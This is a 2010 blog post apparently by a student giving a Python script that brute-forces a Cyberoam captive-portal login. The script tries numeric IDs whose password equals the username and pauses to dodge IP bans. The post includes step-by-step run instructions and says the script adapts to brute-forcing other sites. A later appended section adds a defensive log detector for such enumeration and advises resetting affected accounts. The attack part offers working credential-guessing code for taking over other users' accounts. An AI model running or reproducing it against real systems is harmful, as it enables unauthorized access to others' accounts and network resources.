Sunday, January 31, 2010

CYBEROAM PROF ID's HACKING CODE

Lately I have been getting a lot of queries about Prof IDs, or IDs which have no limit on download or time restrictions. So I am giving out the code which I wrote to scan the IDs. Note that this code can be used to brute force any website (obviously one without a captcha or image-based identification system) with some minor modifications and a good dictionary.



STEPS TO GET PROF IDs (IDs with the same numeric username and password)

1. Download Python IDE from http://www.python.org (not python.com !!!!). I have been using 2.5.1 and recommend the same.
2. Install normally
3. Open Notepad
4. Copy the following code into it, or skip steps 2 and 3 and download the file from http://www.bitproxy.co.cc/data/cyberoam.py


-----------------COPY AFTER HERE----------------



# Cyberaom Prof IDs hacking code
# @author Abhishek Anand, BIT Mesra
# feel free to modify this code but do mail your code to:

codebase@bitproxy.co.cc

import urllib
import time

#this is the range of Ids to check
checkList = range(1,10000)

for i in checkList:
     userid =str(i)
     password= str(i)

     # here a post request is being made to the CyberoamHTTPClient servelet
     # for any other site view its form's source nd make a dictionary of

elements

     dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url':

'', 'username': userid, 'password': password, 'saveinfo': '',  })
     postRequest =

urllib.urlopen("http://172.16.1.1:8090/corporate/servlet/CyberoamHTTPClient",

dataToSend)
     responseData = postRequest.read()

     # reading the faltu string from the output to verify
     if not responseData.count('Make+sure+your+password+is+correct'):
          print userid
      # time to stop scanning before opening URL
          time.sleep(1)
          # here I m opening my Foxy's Updata File :P
          openURLToCheck =

urllib.urlopen("http://www.bitproxy.co.cc/data/file.txt")
          checkData = openURLToCheck.read()
          if checkData.count('2k8'):
               print '------------------------------------------'
               print ' ID FOUND !!!!!    ID FOUND !!!! ID FOUND!!!!'
               print '------------------------------------------'
               print password
    # stopping after 80 checks to prevent temporary IP banning by stupid

Cyberoam
     if i%80 == 0:
          print 'SCAN COMPLETED UPTO ' + str(i)
          time.sleep(3)


         
    
-----------------COPY UPTO HERE--------------------



5. Save the file with .py extension (e.g. hacker.py)
6. Now open the place where you have saved the file.
7. Right click on the file and select 'Edit with IDLE'
8. From the menu options run the program or press F5
9. The OUTPUT will generate both dead and working IDs.
10. ID FOUND !!! ID FOUND !!! means a working ID has been found.


**  You can implement the same thing in Java using the java.net.* libraries, but it may take more lines of code.
**  Please do not use this code on your friends' IDs. :P

For any help feel free to mail me at:  opensource@bitproxy.co.cc

Abhishek Anand
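
Seen from the portal administrator's side, the scan described above leaves a clear trace in authentication logs: one client walking numeric usernames in ascending order, with short pauses between batches. The detector below is an added example, not code from the original post; the event tuple layout, the IP addresses and the thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict

# Constructed sample events: (epoch_seconds, source_ip, username, success).
# This tuple layout is an assumption, not a real Cyberoam log format.
def build_sample():
    events, t = [], 1000.0
    for i in range(1, 201):            # one client walking IDs 1..200
        events.append((t, "10.0.0.5", str(i), i == 137))
        t += 0.2 if i % 80 else 3.2    # short pause after every 80 tries
    events += [(1005.0, "10.0.0.9", "2k8cs101", False),   # ordinary users:
               (1012.0, "10.0.0.9", "2k8cs101", True),    # a typo, then a
               (1030.0, "10.0.0.7", "4521", False),       # successful login
               (1041.0, "10.0.0.7", "4521", True)]
    return sorted(events)

def detect_enumeration(events, window=600, min_distinct=20, min_seq_ratio=0.8):
    """Flag sources trying many distinct numeric usernames in ascending steps.

    Counting distinct usernames over a long window, rather than failures per
    short burst, means pauses between batches do not reset the detector.
    """
    by_src = defaultdict(list)
    for ts, src, user, ok in events:
        by_src[src].append((ts, user, ok))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1             # slide the window forward
            win = rows[start:end + 1]
            users = [u for _, u, _ in win]
            if len(set(users)) < min_distinct:
                continue
            nums = [int(u) for u in users if u.isdecimal()]
            steps = sum(1 for a, b in zip(nums, nums[1:]) if b - a == 1)
            if nums and steps / max(len(nums) - 1, 1) >= min_seq_ratio:
                # successful logins inside a scan are accounts to reset
                hits = sorted({u for _, u, ok in win if ok})
                findings[src] = {"distinct_users": len(set(users)),
                                 "accounts_to_reset": hits}
    return findings

if __name__ == "__main__":
    print(detect_enumeration(build_sample()))
```

Any account listed under accounts_to_reset logged in successfully during the scan, so its password should be treated as guessed and changed, and accounts whose password equals the username should be found and reset before a scan finds them.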